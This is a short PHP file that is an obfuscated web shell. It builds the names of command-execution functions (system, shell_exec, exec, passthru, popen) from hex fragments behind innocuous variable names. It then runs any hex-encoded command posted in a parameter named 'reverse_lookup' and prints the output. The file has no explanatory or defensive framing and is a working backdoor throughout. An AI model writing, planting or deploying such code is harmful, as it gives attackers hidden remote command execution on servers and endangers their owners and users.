<?php


$rec1 = '79';
$rec2 = '73';
$rec3 = '74';
$rec4 = '65';
$rec5 = '6d';
$rec6 = '68';
$rec7 = '6c';
$rec8 = '5f';
$rec9 = '78';
$rec10 = '63';
$rec11 = '70';
$rec12 = '72';
$rec13 = '6f';
$rec14 = '6e';
$rec15 = '61';
$rec16 = '75';
$restore_state1 = pack("H*", '73'.$rec1.$rec2.$rec3.$rec4.$rec5);
$restore_state2 = pack("H*", '73'.$rec6.$rec4.$rec7.$rec7.$rec8.$rec4.'78'.$rec4.'63');
$restore_state3 = pack("H*", '65'.$rec9.$rec4.$rec10);
$restore_state4 = pack("H*", $rec11.'61'.'73'.'73'.'74'.'68'.$rec12.'75');
$restore_state5 = pack("H*", $rec11.$rec13.'70'.$rec4.$rec14);
$restore_state6 = pack("H*", '73'.'74'.$rec12.$rec4.$rec15.'6d'.$rec8.'67'.'65'.$rec3.$rec8.'63'.$rec13.'6e'.'74'.$rec4.$rec14.$rec3.$rec2);
$restore_state7 = pack("H*", $rec11.$rec10.'6c'.$rec13.'73'.'65');
$reverse_lookup = pack("H*", $rec12.'65'.'76'.'65'.'72'.'73'.'65'.'5f'.$rec7.$rec13.'6f'.'6b'.$rec16.$rec11);
if (isset($_POST[$reverse_lookup])) {
    $reverse_lookup = pack("H*", $_POST[$reverse_lookup]);
    if (function_exists($restore_state1)) {
        $restore_state1($reverse_lookup);
    } elseif (function_exists($restore_state2)) {
        print $restore_state2($reverse_lookup);
    } elseif (function_exists($restore_state3)) {
        $restore_state3($reverse_lookup, $value_elem);
        print join("\n", $value_elem);
    } elseif (function_exists($restore_state4)) {
        $restore_state4($reverse_lookup);
    } elseif (function_exists($restore_state5) && function_exists($restore_state6) && function_exists($restore_state7)) {
        $component_resource = $restore_state5($reverse_lookup, 'r');
        if ($component_resource) {
            $reference_marker = $restore_state6($component_resource);
            $restore_state7($component_resource);
            print $reference_marker;
        }
    }
    exit;
}
